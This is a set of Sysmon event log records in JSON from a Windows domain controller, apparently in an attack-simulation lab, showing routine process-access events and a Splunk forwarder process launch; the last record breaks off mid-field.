{"EventTime":"2020-08-01 05:49:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3919,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:50.214\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:50.214","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3920,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:50.214\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:50.214","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3921,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:50.214\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:50.214","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3922,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:50.214\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:50.214","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3923,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:50.214\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:50.214","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3924,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:50.214\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:50.214","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3925,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:50.214\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:50.214","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3926,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:50.214\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-027E-5F25-0000-001074E90500}\r\nTargetProcessId: 2284\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:50.214","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-027E-5F25-0000-001074E90500}","TargetProcessId":"2284","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3927,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:50.902\r\nProcessGuid: {A837DB8D-027E-5F25-0000-001064EB0500}\r\nProcessId: 1540\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: 